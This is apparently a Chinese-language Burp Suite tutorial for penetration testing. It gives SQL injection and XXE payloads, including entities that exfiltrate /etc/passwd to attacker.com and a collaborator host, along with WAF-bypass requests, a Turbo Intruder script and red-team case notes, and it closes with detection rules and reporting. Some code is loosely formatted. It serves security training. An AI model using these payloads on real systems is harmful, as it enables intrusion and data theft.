第一部分:环境搭建与高级配置
1.1 专业版激活与插件生态
# 专业版激活(Linux)
java -jar -Xmx2048m burpsuite_pro.jar --activate --activate-key YOUR_LICENSE_KEY
# 插件管理(推荐必备)
-
Logger++ # 增强日志
-
Turbo Intruder # 高速爆破
-
Autorize # 权限测试
-
SAML Raider # SAML 攻击
-
JWT Editor # JWT 操作
-
Hackvertor # 高级编码
1.2 分布式部署架构
图表
1.3 企业级代理配置
python
# 多级代理配置(Python脚本)
from burp import IBurpExtender
from java.net import Proxy
class BurpExtender(IBurpExtender):
def registerExtenderCallbacks(self, callbacks):
proxy = Proxy(Proxy.Type.HTTP, InetSocketAddress("corp-proxy.com", 8080))
callbacks.setProxy(proxy)
# 添加企业CA证书
callbacks.importPemCertificate("/path/to/corp-ca.pem")
第二部分:深度漏洞挖掘技术
2.1 SQL注入高级利用
二阶SQL注入流程:
- 寻找存储点:注册表单/评论框
- 注入payload:admin'||(SELECT SLEEP(5))--
- Turbo Intruder检测响应延迟
python
# Turbo Intruder脚本
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=50,
requestsPerConnection=100)
for i in range(100):
engine.queue(target.req, randstr(i), gate='race1')
def handleResponse(req, interesting):
if req.time > 5000: # 5 秒延迟判定
table.add(req)
2.2 XXE漏洞深度利用
带外数据提取:
运行
<!-- 基础Payload -->
<!ENTITY % exploit SYSTEM "http://attacker.com/xxe">
<!-- 进阶:提取/etc/passwd -->
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY % exfil SYSTEM 'http://burpcollab.net/?data=%file;'>">
2.3 业务逻辑漏洞挖掘
价格篡改漏洞链:
POST /checkout HTTP/1.1
...
{
"items": [
{
"id": 1001,
"price": -100.00, # 负价格测试
"quantity": 10
}
],
"coupon": "SUMMER2023" # 重复使用测试
}
第三部分:高级绕过技术
3.1 WAF绕过矩阵
| 防御类型 | 绕过技术 | Burp操作 |
|---|---|---|
| SQLi检测 | 分块传输编码 | Chunked Coding Converter插件 |
| XSS过滤 | JSFuck编码 | Hackvertor插件 |
| 速率限制 | 分布式代理池 | 配置上游代理链 |
| 签名校验 | 参数污染( param¶m=) | Param Miner插件 |
3.2 云WAF绕过实战
GET /search?q=1'/**/UNION/*&token=*/SELECT+1,version()-- HTTP/1.1
Host: cloud-protected.com
X-Forwarded-For: 182.23.45.67 # 真实IP
X-Originating-IP: 192.168.1.1 # 绕过IP白名单
第四部分:API安全测试
4.1 GraphQL渗透
json
内省查询检测
{"query":"query IntrospectionQuery { __schema { types { name } } }"}
批量查询攻击
query {
user1: user(id: "1") { email }
user2: user(id: "2") { email }
... # 重复100次
}
4.2 gRPC API测试
- 安装插件:Burp-gRPC
- 加载.proto文件
- 拦截并修改二进制流:
hex
0000 | 00 00 00 00 07 0a 05 61 64 6d 69 6e # 修改admin→hacker
第五部分:企业级自动化
5.1 CI/CD集成
yaml
# GitLab CI 配置
stages:
- security
burp_scan:
stage: security
image: burpsuite/pro:latest
script:
- java -jar burpsuite_pro.jar --scan --config-file=scan_config.json
artifacts:
paths:
- report.html
5.2 自定义扫描插件
java
public class CustomScanner implements IScannerCheck {
public List<IScanIssue> doPassiveScan(IHttpRequestResponse baseReqRes) {
// 检测API密钥泄漏
if (Helpers.analyzeRequest(baseReqRes).getUrl().toString().contains("api_key")) {
return new CustomIssue(baseReqRes, "API Key Exposure");
}
return null;
}
}
第六部分:红队作战案例
案例1:供应链攻击
图表
Burp关键操作:
- 拦截CDN上传请求修改JS文件
- Collaborator监控外联请求
- 重放OAuth令牌获取权限
案例2:0day漏洞挖掘
- 使用Compare Sites对比版本差异
- 定位新增的Java类:com/vuln/NewServlet.class
- 反编译分析找到危险方法:
java
public void doPost(HttpServletRequest req) {
Runtime.getRuntime().exec(req.getParameter("cmd")); // 命令注入
}
第七部分:防御与监控体系
7.1 Burp攻击特征检测
nginx
# Nginx WAF规则
location / {
if ($http_user_agent ~* "Burp") {
return 403;
}
if ($args ~* "§") {
return 403; # 拦截Intruder特征
}
}
7.2 实时攻击告警系统
python
# ELK日志告警规则
alert:
- name: "Burp Intruder Attack"
index: "web_logs*"
condition: >
ctx.payload.aggs.unique_ips.buckets
.filter(bucket -> bucket.doc_count > 1000)
actions:
- wecom_alert:
corp_id: "wwxxx"
secret: "xxx"
第八部分:企业级报告输出
8.1 漏洞报告模板
markdown
[高危] SQL注入漏洞
**受影响端点**:
- POST /api/user/search
**漏洞验证**:
```http
POST /api/user/search HTTP/1.1
...
{"filter":"name' AND EXTRACTVALUE(1,CONCAT(0x5c,USER()))-- "}
响应特征:
{"error":"XPATH syntax error: '\\root@localhost'"}
修复建议:
- 使用参数化查询
- 添加输入过滤:[a-zA-Z0-9]+
8.2 自动化报告生成
```bash
使用Burp API生成报告
curl -X POST https://burp.example.com:8080/report \
-H "Authorization: Bearer API_TOKEN" \
-d '{
"template": "custom",
"issues": ["SQLi","XSS"]
}'
附录:企业级实战靶场
| 靶场名称 | 特点 | 下载链接 |
|---|---|---|
| Juice Shop | OWASP综合漏洞 | https://github.com/bkimminich/juice-shop |
| DVSA | 车联网漏洞 | https://github.com/SecurityInnovation/DVSA |
| AWS Goat | 云环境漏洞 | https://github.com/ine-labs/AWSGoat |
| AD Lab | 内网渗透环境 | https://github.com/clong/DetectionLab |
本教程配套资源:
- Burp配置文件包(包含企业级扫描策略)
- 高级绕过Payload字典(2000+条目)
- 自定义插件开发模板
- 红队作战手册(含50个真实案例)
- 视频教程
【黑客必备工具burpsuite基础使用教程,渗透测试入门必学burp,从入门到入狱,零基础入门网络安全/渗透测试/漏洞挖掘】 https://www.bilibili.com/video/BV1vtPaeUESi/?share_source=copy_web&vd_source=783115a80c3cf673f20dd9daa9d98955
【【2025最新版】BurpSuite抓包零基础入门教程(全4集)】 https://www.bilibili.com/video/BV17ffbYAEjk/?share_source=copy_web&vd_source=783115a80c3cf673f20dd9daa9d98955
通过本深度教程,您将掌握从基础操作到APT级攻击的完整技能栈,适用于企业红蓝对抗、渗透测试、漏洞研究等高级场景。